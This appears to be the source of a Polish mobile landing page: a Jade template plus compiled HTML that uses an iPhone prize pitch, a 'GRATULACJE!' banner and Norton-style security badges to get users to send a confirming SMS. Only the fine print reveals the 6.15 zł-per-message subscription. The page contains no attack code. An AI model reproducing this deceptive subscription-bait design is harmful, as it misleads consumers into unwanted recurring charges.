assets/jade/second.jade
doctype
html(lang='en')
	head
		title iPhone X lite version (PO)
		include inc/meta
		include inc/css
	body
		.body
			.page2
				.header
					h1 GRATULACJE!
				img.logo(src="img/img-header-2-nd-screen.png", srcset="img/img-header-2-nd-screen@2x.png 2x, img/img-header-2-nd-screen@3x.png 3x")
				.help 
					.help-text Kliknij “POTWIERDZAM”<br>i wyślij SMSa aby potwierdzić<br>swój numer telefonu
					a.btn.btn-primary(href="#a") POTWIERDZAM
				br
			include inc/secure
			include inc/apps
			include inc/text
			include inc/footer
		include inc/js

www/resources/second.html
<!DOCTYPE html>
<html lang="en">
	<head>
		<title>iPhone X lite version (PO)</title>
		<meta charset="utf-8">
		<meta name="viewport" content="width=360">
		<link rel="stylesheet" href="vendor/bootstrap/css/bootstrap.min.css">
		<link rel="stylesheet" href="css/app.css">
	</head>
	<body>
		<div class="body">
			<div class="page2">
				<div class="header">
					<h1>GRATULACJE!</h1>
				</div><img src="img/img-header-2-nd-screen.png" srcset="img/img-header-2-nd-screen@2x.png 2x, img/img-header-2-nd-screen@3x.png 3x" class="logo">
				<div class="help"> 
					<div class="help-text">Kliknij “POTWIERDZAM”<br>i wyślij SMSa aby potwierdzić<br>swój numer telefonu</div><a href="#a" class="btn btn-primary">POTWIERDZAM</a>
				</div><br>
			</div>
			<div class="secure"><img src="img/ico-norton.png" srcset="img/ico-norton@2x.png 2x, img/ico-norton@3x.png 3x"><img src="img/ico-secure.png" srcset="img/ico-secure@2x.png 2x, img/ico-secure@3x.png 3x"><img src="img/ico-safe.png" srcset="img/ico-safe@2x.png 2x, img/ico-safe@3x.png 3x"></div>
			<div class="apps">
				<h3>OTRZYMASZ NIEOGRANICZONY DOSTĘP DO SERWISU PRODUKTÓW MOBILNYCH</h3>
				<div class="container">
					<div class="row">
						<div class="col"><a href="#"><img src="img/apps/app-01.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-02.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-03.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-04.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-05.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-06.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-07.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-08.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-09.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-10.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-11.png"></a></div>
						<div class="col"><a href="#"><img src="img/apps/app-12.png"></a></div>
					</div>
				</div>
			</div>
			<div class="text">Serwis URPRIZE stanowi świadczenie dodatkowe w ramach usługi o podwyższonej opłacie i jest usługą subskrypcyjną. Serwis dostępny jest na telefony komórkowe bądź inne urządzenia mobilne. Kliknij tutaj aby sprawdzic Obsługiwane telefony, posiadające kartę SIM w sieci Orange, Plus, T-Mobile i Play. Koszt usługi to 6,15 zł brutto za każdy SMS otrzymany w ramach subskrypcji. W ramach usługi użytkownik otrzymuje maksymalnie 5 SMS/tydzień. Pobranie wybranych elementów multimedialnych może ponadto wiązać się z opłatami za transfer danych, zgodnie z cennikami operatora. Usługa jest aktywowana na czas nieokreślony, do czasu rezygnacji przez użytkownika. Aby zrezygnować z usługi należy wysłać sms-a o tresci STOP FUN na nr 60568 (koszt wynosi 0zl). Koszty będą doliczone do Twojego rachunku za telefon bądź potrącane z Twojego salda. Telefon musi posiadać połączenie z Internetem, możliwość obsługi SMS oraz możliwość zapisu treści pobranych z Internetu. Serwis URPRIZE nie jest powiązany, sponsorowany lub popierany przez żaden z wymienionych producentow lub sprzedawców detalicznych. Znaki towarowe, znaki usług, loga są własnością ich poszczególnych właścicieli. Aby zapisać się i korzystać z usługi musisz być właścicielem telefonu i mieć ukończone 18 lat bądź uzyskać zgodę właściciela telefonu. Wszelkie testy, gry lub aplikacje zaprezentowane na tej stronie internetowej są wyłącznie przeznaczone na cele rozrywkowe. Aby uzyskać informacje wyślij e-mail na adres cs_pl@emobi.biz. eMobi Pte. Ltd 20 Maxwell Road, Maxwell House #09-17, Singapore 069113.</div>
			<div class="links">
				<ul>
					<li><a href="#">Regulamin</a></li>
					<li><a href="#">Obsługiwane telefony</a></li>
					<li><a href="#">Polityka prywatności</a></li>
					<li><a href="#">Konkursy</a></li>
				</ul>
			</div>
			<div class="prizehub"><a href="#"><img src="img/logo-prizehub.png" srcset="img/logo-prizehub@2x.png 2x, img/logo-prizehub@3x.png 3x"></a></div>
		</div>
		<script src="vendor/jquery/jquery-3.2.1.min.js"></script>
	</body>
</html>
